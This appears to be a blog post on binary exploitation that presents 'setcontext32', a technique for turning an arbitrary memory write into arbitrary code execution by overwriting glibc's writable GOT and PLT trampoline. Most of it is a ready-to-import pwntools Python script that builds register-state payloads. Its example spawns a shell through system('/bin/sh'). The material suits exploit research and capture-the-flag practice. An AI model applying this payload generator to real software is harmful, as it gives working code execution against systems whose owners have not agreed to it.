Currently, converting an arbitrary write primitive into RCE is a messy process. The good old days of __free_hook
are long gone; now you've got to leak the ptr mangling cookie to modify an existing __exit_funcs
entry, maybe compute the offset to ld.so
to overwrite l_addr
and create a fake DT_FINI
entry, or perhaps setup special _codecvt
and _wide_data
structures on hijacked IO objects… I'd just like to specify the function I want to call and its arguments!
I want a flexible RCE primitive. I don't want to rely on _IO_cleanup
, _dl_fini
, or malloc
to call my injected code. I want an inherently universal gadget, a gadget I can expect to be called with the most messed up heap bins and broken IO objects. I want to be able to call any function with any set of arguments without needing to stack pivot or pray system
is stack aligned. I don't want to satisfy several constraints so one_gadget
will work!
setcontext32 is a neat method to convert arbitrary write to flexible arbitrary code execution. Roughly, it looks like:
write(libc_write_address, flat(
p64(0),
p64(libc_write_address + 0x218)
p64(setcontext+32),
p64(libc_exe_address) * 0x40,
cpu_state_information,
))
Where libc_write_address
is the start of the writeable page in libc, libc_exe_address
is the start of the executable page in libc, and cpu_state_information
is a structure that contains all current registers, including rsp
and rip
.
Every GOT entry in libc such as memset
, memcpy
, strcpy
, and strlen
is replaced with the PLT trampoline, which starts at the beginning of the executable page. The PLT trampoline pushes a fake linkmap, libc_write_address + 0x218
, and calls a fake runtime resolver, setcontext+32
, all of which starts at the beginning of the writeable page.
setcontext+32
pops libc_write_address + 0x218
off the stack, and treats it as a pointer to a saved ucontext_t
. It'll then load your structure as the current CPU state.
Calling most libc functions will trigger setcontext32, including malloc
, exit
, and (almost?) every IO operation.
libc's GOT is writeable so that you may use architecture specific functions, such as memcpy
optimized for SSE or AVX512. A friend also guessed that it could be for ltrace
. I learned the libc GOT was writeable from pwndbg creator disconnect3d.
Here's code you can readily import to generate setcontext32 payloads (or integrate into your pwn libraries). An example is below.
setcontext32.py
from pwn import *
def create_ucontext(
src: int,
rsp=0,
rbx=0,
rbp=0,
r12=0,
r13=0,
r14=0,
r15=0,
rsi=0,
rdi=0,
rcx=0,
r8=0,
r9=0,
rdx=0,
rip=0xDEADBEEF,
) -> bytearray:
b = bytearray(0x200)
b[0xE0:0xE8] = p64(src) # fldenv ptr
b[0x1C0:0x1C8] = p64(0x1F80) # ldmxcsr
b[0xA0:0xA8] = p64(rsp)
b[0x80:0x88] = p64(rbx)
b[0x78:0x80] = p64(rbp)
b[0x48:0x50] = p64(r12)
b[0x50:0x58] = p64(r13)
b[0x58:0x60] = p64(r14)
b[0x60:0x68] = p64(r15)
b[0xA8:0xB0] = p64(rip) # ret ptr
b[0x70:0x78] = p64(rsi)
b[0x68:0x70] = p64(rdi)
b[0x98:0xA0] = p64(rcx)
b[0x28:0x30] = p64(r8)
b[0x30:0x38] = p64(r9)
b[0x88:0x90] = p64(rdx)
return b
def setcontext32(libc: ELF, **kwargs) -> (int, bytes):
got = libc.address + libc.dynamic_value_by_tag("DT_PLTGOT")
plt_trampoline = libc.address + libc.get_section_by_name(".plt").header.sh_addr
return got, flat(
p64(0),
p64(got + 0x218),
p64(libc.symbols["setcontext"] + 32),
p64(plt_trampoline) * 0x40,
create_ucontext(got + 0x218, rsp=libc.symbols["environ"] + 8, **kwargs),
)
if __name__ == "__main__":
libc = ELF("./libc.so.6")
dest, payload = setcontext32.setcontext32(
libc, rip=libc.sym["system"], rdi=libc.search(b"/bin/sh").__next__()
)
print(hex(dest), payload.hex())